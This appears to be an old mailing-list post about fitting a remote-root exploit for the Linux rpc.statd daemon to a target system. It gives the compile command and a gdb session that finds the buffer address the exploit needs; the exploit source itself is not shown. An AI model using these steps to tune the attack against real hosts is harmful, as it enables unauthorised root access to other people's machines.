rpc.statd remote root xploit for linux/x86 (little fix)

[Doing <jdoing () teleline es>]

 To compile the xploit you need the librpcsvc library:

gcc statd.c -o statd -lrpcsvc

 Way of finding offsets for your distro/version:

Launch statd and attach it with gdb:

[root@localhost statd]# ./statd
[root@localhost statd]# ps aux | grep st
root       394  0.0  0.9  1184   576  ?  S    15:27   0:00 ./statd
[root@localhost statd]# gdb ./statd
GNU gdb 4.18
[ cut    cut    cut    cut   ]
(gdb) attach 394
Attaching to program:
/zecreto/doing/xploits/daemon/rpc.statd/knfsd-1.3.2/utils/statd/./statd,
process 394

[ Now put a breakpoint on the function log() ]
(gdb) break log
Breakpoint 1 at 0x804a10a: file log.c, line 82.
(gdb) c
Continuing.

[ At this point run the xploit ]
Breakpoint 1, log (level=2, fmt=0x804c820 "SM_MON request for hostname
containing '/': %s") at log.c:82
82          va_start(ap, fmt);

[ And put another breakpoint in the function syslog() ]
(gdb) break syslog
Breakpoint 2 at 0x400d12e6: file syslog.c, line 102.
(gdb) c
Continuing.

Breakpoint 2, syslog (pri=2,
    fmt=0xbfffef38 "SM_MON request for hostname containing '/':
[garbage]..)
         ^^^^^^^^^
           This is the address of the buffer in function log. If you run
the xploit
with this value it should work.

 Doing